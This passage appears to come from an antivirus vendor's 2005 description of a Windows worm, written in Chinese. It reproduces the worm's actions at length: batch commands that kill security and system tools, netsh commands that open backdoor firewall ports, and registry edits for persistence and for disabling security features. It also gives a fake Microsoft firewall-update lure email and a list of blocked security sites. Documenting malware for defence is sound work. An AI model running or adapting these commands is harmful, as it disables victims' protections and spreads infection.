@taskkill /IM REGEDT32.exe /F
@taskkill /IM RESCUE.exe /F
@taskkill /IM RESCUE32.exe /F
@taskkill /IM RRGUARD.exe /F
@taskkill /IM RSHELL.exe /F
@taskkill /IM RTVSCAN.exe /F
@taskkill /IM RTVSCN95.exe /F
@taskkill /IM RULAUNCH.exe /F
@taskkill /IM RUN32DLL.exe /F
@taskkill /IM RUNDLL.exe /F
@taskkill /IM RUNDLL16.exe /F
@taskkill /IM RUXDLL32.exe /F
@taskkill /IM SAFEWEB.exe /F
@taskkill /IM SAHAGENT.exe /F
@taskkill /IM SAVE.exe /F
@taskkill /IM SAVENOW.exe /F
@taskkill /IM SBSERV.exe /F
@taskkill /IM SC.exe /F
@taskkill /IM SCAM32.exe /F
@taskkill /IM SCAN32.exe /F
@taskkill /IM SCAN95.exe /F
@taskkill /IM SCANPM.exe /F
@taskkill /IM SCRSCAN.exe /F
@taskkill /IM SETUPVAMEEVAL.exe /F
@taskkill /IM SETUP_FLOWPROTECTOR_US.exe /F
@taskkill /IM SFC.exe /F
@taskkill /IM SGSSFW32.exe /F
@taskkill /IM SH.exe /F
@taskkill /IM SHELLSPYINSTALL.exe /F
@taskkill /IM SHN.exe /F
@taskkill /IM SHOWBEHIND.exe /F
@taskkill /IM SMC.exe /F
@taskkill /IM SMS.exe /F
@taskkill /IM SMSS32.exe /F
@taskkill /IM SOAP.exe /F
@taskkill /IM SOFI.exe /F
@taskkill /IM SPERM.exe /F
@taskkill /IM SPF.exe /F
@taskkill /IM SPHINX.exe /F
@taskkill /IM SPOLER.exe /F
@taskkill /IM SPOOLCV.exe /F
@taskkill /IM SPOOLSV32.exe /F
@taskkill /IM SPYXX.exe /F
@taskkill /IM SREXE.exe /F
@taskkill /IM SRNG.exe /F
@taskkill /IM SS3EDIT.exe /F
@taskkill /IM SSGRATE.exe /F
@taskkill /IM SSG_4104.exe /F
@taskkill /IM ST2.exe /F
@taskkill /IM START.exe /F
@taskkill /IM STCLOADER.exe /F
@taskkill /IM SUPFTRL.exe /F
@taskkill /IM SUPPORT.exe /F
@taskkill /IM SUPPORTER5.exe /F
@taskkill /IM SVC.exe /F
@taskkill /IM SVCHOSTC.exe /F
@taskkill /IM SVCHOSTS.exe /F
@taskkill /IM SVSHOST.exe /F
@taskkill /IM SWEEP95.exe /F
@taskkill /IM SWEEPNET.SWEEPSRV.SYS.SWNETSUP.exe /F
@taskkill /IM SYMPROXYSVC.exe /F
@taskkill /IM SYMTRAY.exe /F
@taskkill /IM SYSEDIT.exe /F
@taskkill /IM SYSTEM.exe /F
@taskkill /IM SYSTEM32.exe /F
@taskkill /IM SYSUPD.exe /F
@taskkill /IM TASKMG.exe /F
@taskkill /IM TASKMO.exe /F
@taskkill /IM TASKMON.exe /F
@taskkill /IM TAUMON.exe /F
@taskkill /IM TBSCAN.exe /F
@taskkill /IM TC.exe /F
@taskkill /IM TCA.exe /F
@taskkill /IM TCM.exe /F
@taskkill /IM TDS-3.exe /F
@taskkill /IM TDS2-NT.exe /F
@taskkill /IM TEEKIDS.exe /F
@taskkill /IM TFAK.exe /F
@taskkill /IM TFAK5.exe /F
@taskkill /IM TGBOB.exe /F
@taskkill /IM TITANIN.exe /F
@taskkill /IM TITANINXP.exe /F
@taskkill /IM TRACERT.exe /F
@taskkill /IM TRICKLER.exe /F
@taskkill /IM TRJSCAN.exe /F
@taskkill /IM TRJSETUP.exe /F
@taskkill /IM TROJANTRAP3.exe /F
@taskkill /IM TSADBOT.exe /F
@taskkill /IM TVMD.exe /F
@taskkill /IM TVTMD.exe /F
@taskkill /IM UNDOBOOT.exe /F
@taskkill /IM UPDAT.exe /F
@taskkill /IM UPDATE.exe /F
@taskkill /IM UPDATE.exe /F
@taskkill /IM UPGRAD.exe /F
@taskkill /IM UTPOST.exe /F
@taskkill /IM VBCMSERV.exe /F
@taskkill /IM VBCONS.exe /F
@taskkill /IM VBUST.exe /F
@taskkill /IM VBWIN9X.exe /F
@taskkill /IM VBWINNTW.exe /F
@taskkill /IM VCSETUP.exe /F
@taskkill /IM VET32.exe /F
@taskkill /IM VET95.exe /F
@taskkill /IM VETTRAY.exe /F
@taskkill /IM VFSETUP.exe /F
@taskkill /IM VIR-HELP.exe /F
@taskkill /IM VIRUSMDPERSONALFIREWALL.exe /F
@taskkill /IM VNLAN300.exe /F
@taskkill /IM VNPC3000.exe /F
@taskkill /IM VPC32.exe /F
@taskkill /IM VPC42.exe /F
@taskkill /IM VPFW30S.exe /F
@taskkill /IM VPTRAY.exe /F
@taskkill /IM VSCAN40.exe /F
@taskkill /IM VSCENU6.02D30.exe /F
@taskkill /IM VSCHED.exe /F
@taskkill /IM VSECOMR.exe /F
@taskkill /IM VSHWIN32.exe /F
@taskkill /IM VSISETUP.exe /F
@taskkill /IM VSMAIN.exe /F
@taskkill /IM VSMON.exe /F
@taskkill /IM VSSTAT.exe /F
@taskkill /IM VSWIN9XE.exe /F
@taskkill /IM VSWINNTSE.exe /F
@taskkill /IM VSWINPERSE.exe /F
@taskkill /IM W32DSM89.exe /F
@taskkill /IM W9X.exe /F
@taskkill /IM WATCHDOG.exe /F
@taskkill /IM WEBDAV.exe /F
@taskkill /IM WEBSCANX.exe /F
@taskkill /IM WEBTRAP.exe /F
@taskkill /IM WFINDV32.exe /F
@taskkill /IM WHOSWATCHINGME.exe /F
@taskkill /IM WIMMUN32.exe /F
@taskkill /IM WIN-BUGSFIX.exe /F
@taskkill /IM WIN32.exe /F
@taskkill /IM WIN32US.exe /F
@taskkill /IM WINACTIVE.exe /F
@taskkill /IM WINDOW.exe /F
@taskkill /IM WINDOWS.exe /F
@taskkill /IM WININETD.exe /F
@taskkill /IM WININIT.exe /F
@taskkill /IM WININITX.exe /F
@taskkill /IM WINLOGIN.exe /F
@taskkill /IM WINMAIN.exe /F
@taskkill /IM WINNET.exe /F
@taskkill /IM WINPPR32.exe /F
@taskkill /IM WINRECON.exe /F
@taskkill /IM WINSERVN.exe /F
@taskkill /IM WINSSK32.exe /F
@taskkill /IM WINSTART.exe /F
@taskkill /IM WINSTART001.exe /F
@taskkill /IM WINTSK32.exe /F
@taskkill /IM WINUPDATE.exe /F
@taskkill /IM WKUFIND.exe /F
@taskkill /IM WNAD.exe /F
@taskkill /IM WNT.exe /F
@taskkill /IM WRADMIN.exe /F
@taskkill /IM WRCTRL.exe /F
@taskkill /IM WSBGATE.exe /F
@taskkill /IM WUPDATER.exe /F
@taskkill /IM WUPDT.exe /F
@taskkill /IM WYVERNWORKSFIREWALL.exe /F
@taskkill /IM XPF202EN.exe /F
@taskkill /IM ZAPRO.exe /F
@taskkill /IM ZAPSETUP3001.exe /F
@taskkill /IM ZATUTOR.exe /F
@taskkill /IM ZONALM2601.exe /F
@taskkill /IM ZONEALARM.exe /F
@taskkill /IM _AVP32.exe /F
@taskkill /IM _AVPCC.exe /F
@taskkill /IM _AVPM.exe /F
@taskkill /IM CMD.exe /F
@taskkill /IM TASKMGR.EXE /F
@taskkill /IM NEC.EXE /F
F 覆盖C:\WINDOWS\System32\Firewall.bat文件,来打开防火墙的各种设置
@netsh firewall add portopening tcp 7 Echo
@netsh firewall add portopening tcp 443 HTTPS
@netsh firewall add portopening tcp 445 Echo Request
@netsh firewall add portopening tcp 135 File Sharing
@netsh firewall add portopening tcp 137 File Sharing
@netsh firewall add portopening tcp 139 File Sharing
@netsh firewall add portopening tcp 110 POP3
@netsh firewall add portopening tcp 109 POP2
@netsh firewall add portopening tcp 21 FTP
@netsh firewall add portopening tcp 20 FTP-Data
@netsh firewall add portopening tcp 25 SMTP
@netsh firewall add portopening tcp 23 Telnet
@netsh firewall add portopening tcp 22 SSH
@netsh firewall add portopening tcp 80 HTTP
@netsh firewall add portopening tcp 8080 HTTP Proxy
@netsh firewall add portopening tcp 5554 Backdoor
@netsh firewall add portopening tcp 1080 Proxy
@netsh firewall add portopening tcp 3389 Remote Destop
@netsh firewall add portopening tcp 4899 Remote Administrator
@netsh firewall add portopening tcp 5800 VNC
@netsh firewall add portopening tcp 5900 VNC
@netsh firewall add portopening tcp 6667 Backdoor
@netsh firewall add portopening tcp 42 WINS
@netsh firewall add portopening tcp 256 Firewall
@netsh firewall add portopening tcp 257 Firewall
@netsh firewall add portopening tcp 259 Firewall
@netsh firewall add portopening tcp 70 gopher
@netsh firewall add portopening tcp 79 Finger
@netsh firewall add portopening tcp 53 DNS
@netsh firewall add portopening tcp 258 Firewall
@netsh firewall add portopening tcp 1745 PPTP
@netsh firewall add portopening tcp 1723 PPTP
@netsh firewall add portopening udp 69 UDP
@netsh firewall add portopening udp 53 DNS Server
@netsh firewall add portopening udp 1810 IAS
@netsh firewall add portopening udp 1811 IAS
G 增加注册表项
"WINLOGON" = "wscript.exe C:\Windows\System32\WINLOGON.vbs %"
"Tasmgr" = "C:\WINDOWS\System32\Taskmgr.bat"
"Firewall" = "C:\WINDOWS\System32\Firewall.bat"
到注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run
使得病毒在每次开机后自动执行和破坏
H 增加注册表项
"Event17" = "dcc send $nick C:\Virc\Sexy Girls.mpg.vbs"
到注册表的
HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events
使得病毒通过IRC频道传播
I增加注册表项
"1" = "regedit.exe"
"2" = "regedt32.exe"
"3" = "taskmgr.exe"
"4" = "wuauclt1.exe"
"5" = "wuauclt.exe"
"6" = "wupdmgr.exe"
"7" = "vptray.exe"
"8" = "wupdmgr.exe"
"9" = "vpc32.exe"
"10" = "LUAll.exe"
到注册表的
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
降低系统安全防范
J增加注册表项
"1" = "regedit.exe"
"2" = "regedt32.exe"
"3" = "taskmgr.exe"
"4" = "wuauclt1.exe"
"5" = "wuauclt.exe"
"6" = "wupdmgr.exe"
"7" = "vptray.exe"
"8" = "wupdmgr.exe"
"9" = "vpc32.exe"
"10" = "LUAll.exe"
到注册表的
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
降低系统安全防范
K 增加注册表项
"DisableRegistryTools" = "1"
"DisableTaskMgr" = "1"
"NoVirtMemPage" = "1"
到注册表的
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
来禁用一些安全软件
L增加注册表项
"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"
"UpdatesDiasbleNotify" = "1"
"AntivirusDisableNotify" = "1"
到注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
降低系统安全防范
M增加注册表项"Disabled = "1"到注册表的
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp
N 增加注册表项"NoControlPanel" = "1"到注册表的
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
O增加注册表项"WinStationsDisabled" ="1"到注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
P增加注册表项"AUOptions = "1"到注册表的
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update
Q增加注册表项"DomainProfile" = "1"到注册表的
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall
R增加注册表项"EnableFirewall" = "1"到注册表的
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\StandardProfile
S增加注册表项"DisableNotifications" = "1" 、"EnableFirewall" = "0"到注册表的
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sharedaccess\Parameters\FirewallPolicy\StandardProfile
T增加注册表项"ServiceUpgrade" = "0"到注册表的
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Setup
U增加注册表项"wscsvc" = "4"到注册表的
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
V增加注册表项"Start" = "4"到注册表的
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShareAccess
W 删除注册表
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HTTPFilter\Parameters\description
X 搜寻Windows地址簿发送病毒邮件
标题: Your Microsoft Firewall Help
内容:Microsoft found a problem in your last update with your Windows Firewall. To fix the problem you must install the attached file.
Microsoft (R)
http://windowsupdate.microsoft.com
附件: WINLOGON.vbs
Y 如果系统中安装了IRC,发送c:\windows\system\porno.vbs到所有的IRC 频道
Z 修改所有在C:\Windows\Inf 目录中扩展名为.iis 的文件,增加一行文本:
Source: C:\WINDOWS\System32\WINLOGON.vbs; DestDir: {app}; Flags: ignoreversion
AA 关闭以下地址的计算机
1. 192.168.1.15
2. 192.168.1.16
3. 192.168.1.17
4. 192.168.1.18
5. 192.168.1.19
6. 192.168.1.20
7. 192.168.1.21
8. 192.168.1.22
9. 192.168.1.23
10. 192.168.1.24
11. 192.168.1.25
12. 192.168.1.26
13. 192.168.1.27
14. 192.168.1.28
15. 192.168.1.29
16. 192.168.1.30
17. 192.168.1.31
18. 192.168.1.32
19. 192.168.1.33
20. 192.168.1.34
21. 192.168.1.35
22. 192.168.1.36
23. 192.168.1.37
24. 192.168.1.38
25. 192.168.1.39
26. 192.168.1.40
27. 192.168.1.41
28. 192.168.1.42
29. 192.168.1.43
30. 192.168.1.44
31. 192.168.1.45
32. 192.168.1.46
33. 192.168.1.47
34. 192.168.1.101
35. 192.168.1.102
36. 192.168.1.103
37. 192.168.1.104
38. 192.168.1.105
39. 192.168.1.106
40. 192.168.1.107
41. 192.168.1.108
42. 192.168.1.109
43. 192.168.1.111
44. 192.168.1.112
45. 192.168.1.113
46. 192.168.1.114
47. 192.168.1.115
48. 192.168.1.116
49. 192.168.1.117
50. 192.168.1.118
51. 192.168.1.119
52. 192.168.1.120
53. 192.168.15.100
54. 192.168.15.101
55. 192.168.15.102
56. 192.168.15.103
57. 192.168.15.104
58. 192.168.15.105
59. 192.168.15.106
60. 192.168.15.107
61. 192.168.15.108
62. 192.168.15.109
63. 192.168.15.111
64. 192.168.15.112
65. 192.168.15.113
66. 192.168.15.114
67. 192.168.15.115
68. 192.168.15.116
69. 192.168.15.117
70. 192.168.15.118
71. 192.168.15.119
72. 192.168.15.120
AB 屏蔽以下网站的访问
www.symantec.com
securityresponse.symantec.com
symantec.com
www.sophos.com
sophos.com
www.mcafee.com
mcafee.com
liveupdate.symantecliveupdate.com
www.viruslist.com
viruslist.com
viruslist.com
f-secure.com
www.f-secure.com
kaspersky.com
kaspersky-labs.com
www.avp.com
www.kaspersky.com
avp.com
www.networkassociates.com
networkassociates.com
www.ca.com
ca.com
mast.mcafee.com
my-etrust.com
www.my-etrust.com
download.mcafee.com
dispatch.mcafee.com
secure.nai.com
nai.com
www.nai.com
update.symantec.com
updates.symantec.com
us.mcafee.com
liveupdate.symantec.com
customer.symantec.com
rads.mcafee.com
trendmicro.com
www.trendmicro.com
www.grisoft.com
www.microsoft.com
microsoft.com
www.MSN.com
www.virustotal.com
virustotal.com
www.oxyd.fr
oxyd.fr
www.t35.com
t35.com
www.t35.net
t35.net
www.norton.com
www.sarc.com
downloads-us1.kaspersky-labs.com
updates1.kaspersky-labs.com
updates2.kaspersky-labs.com
updates3.kaspersky-labs.com
downloads1.kaspersky-labs.com
downloads2.kaspersky-labs.com
downloads3.kaspersky-labs.com
ftp.downloads1.kaspersky-labs.com
ftp.downloads2.kaspersky-labs.com
ftp.downloads3.kaspersky-labs.com
ftp.symantec.com
windowsupdate.microsoft.com
Officeupdate.microsoft.com
www.kddi.de
www.uni-cert.nl
www.sarc.com
www.thesecure.net
www.downloads.com
www.spacelink.com.au
www.akonix.com
www.linknet.com.au
www.techzoom.net
content.tibs.at
www.corsaire.com
jp.fujitsu.com
www.tmsr.net
www.kp24.de
www.headliner.org
newsFlash.nifty.com
www.cjmtechs.com
www.yuikee.com.hk
www.hackzona.ru
www.xpect.ch
computers.yahoo.co.jp
kuro.nobody.jp
citadelle.intrinsec.com
computer.msn.co.jp
www.south.rit.ac.th
d.hatena.ne.jp
www.oct-net.ne.jp
bbs.whnet.edu.cn
www.tac.cz
omakase.jp
stats.epiknet.org
www.alter-net.com
sid.softek.co.jp
news.goo.ne.jp
www.fken.ise.osaka-sandai.ac.jp
www.rolan.si
www.searchready.co.uk
192.168.1.1
192.168.15.1
AC 执行C:\WINDOWS\System32\Firewall.bat.
AD 显示对话框
光华反病毒软件已经及时对这种病毒进行了处理,请用户升级后,使用光华反病毒软件清除。
病毒的清除法: 使用光华反病毒软件,彻底删除。 病毒演示: 病毒FAQ: Windows下的PE病毒。
发现日期: 2005-6-20
(出处:http://www.knowsky.com)